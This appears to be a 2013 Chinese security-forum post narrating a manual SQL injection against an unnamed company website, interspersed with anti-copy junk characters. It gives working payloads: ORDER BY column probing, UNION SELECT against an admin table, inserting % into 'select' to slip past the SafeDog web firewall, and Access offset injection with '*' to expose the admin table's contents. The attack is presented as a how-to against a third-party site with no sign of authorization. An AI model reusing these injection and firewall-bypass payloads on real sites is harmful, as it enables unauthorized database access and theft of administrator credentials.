找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2176|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。5 S9 k! J7 `+ y4 t; d, j: ?
1 Y% V& I' }& d! ^0 E: z( v

/ W" G- M3 k" e9 N3 h+ S顺手加个admin7 _4 @+ e, P9 L

! a' @# \' x% a# E+ R( |# e  B! K) i
默认后台。/ @( S) i6 W0 |: [
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
; f5 Z3 T5 `& w9 e! t- C4 m3 ^" N. g
! {& n& r8 q3 K. @
* k" m* B" D6 ?/ H& o% u. `, c
8 I% l  Z5 K/ R所以就不用御剑扫了,待会直接封IP。
& F6 y8 G6 b) k1 M# ?2 V! Z ! p; I# N+ z) O' n5 ]4 E6 r
用order by语句判断是否存在注入。
7 Q( p: r+ _" r( P: i# M' M$ j+ r7 Khttp://www.xxx.com /product_show.asp?id=997 order by 1) T% B% D7 u" `; `% y# }+ }+ O
http://www.xxx.com /product_show.asp?id=997 order by 100, m; N; m- s( f- U! i
现在存在注入,经测试后发现是9个字段。9 S7 X& V1 k) `/ w9 Z: I" Z
8 _( D& N8 G- N# r. x
接下来进行联合查询,猜是否存在admin表。1 d# F% U. ?: w& _, y
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​: _& ?/ R: F3 k% t9 B, A$ X$ ^, d! V
; s, O- [" a& e
8 Q* Q; Y% q' J) O

* U! Z' i; o7 e0 Z在select中间加个%,se%lect绕过安全狗。3 \, n5 y* ~6 n* c
  D6 s) Q" I9 D7 F; u) y, H4 ]
/ O6 y+ z0 Q7 w# d
发现存在admin表,然后开始手工猜常用的字段。
8 [+ r* R6 ]# j* a- z/ {% Z纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。/ x) f7 c! {5 Z5 k( m+ Q- f, i8 W8 t
0 n; ]: j. b1 d/ K8 e- B
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。8 ?$ i, }5 f" R0 E0 D. p6 M# F

4 i: A% ]" Z2 X科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
, m4 B* `; P3 Y' e# t# w1 m0 xhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
" F" `6 S, |! j1 S好了,敏感内容出显了。​" p! I9 E6 h. I; b9 j9 }4 }
# n/ @9 t) b' t" `; \
; z# s& |  h. i* \1 Y

; m! U1 _. A' X) m2 Q) d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表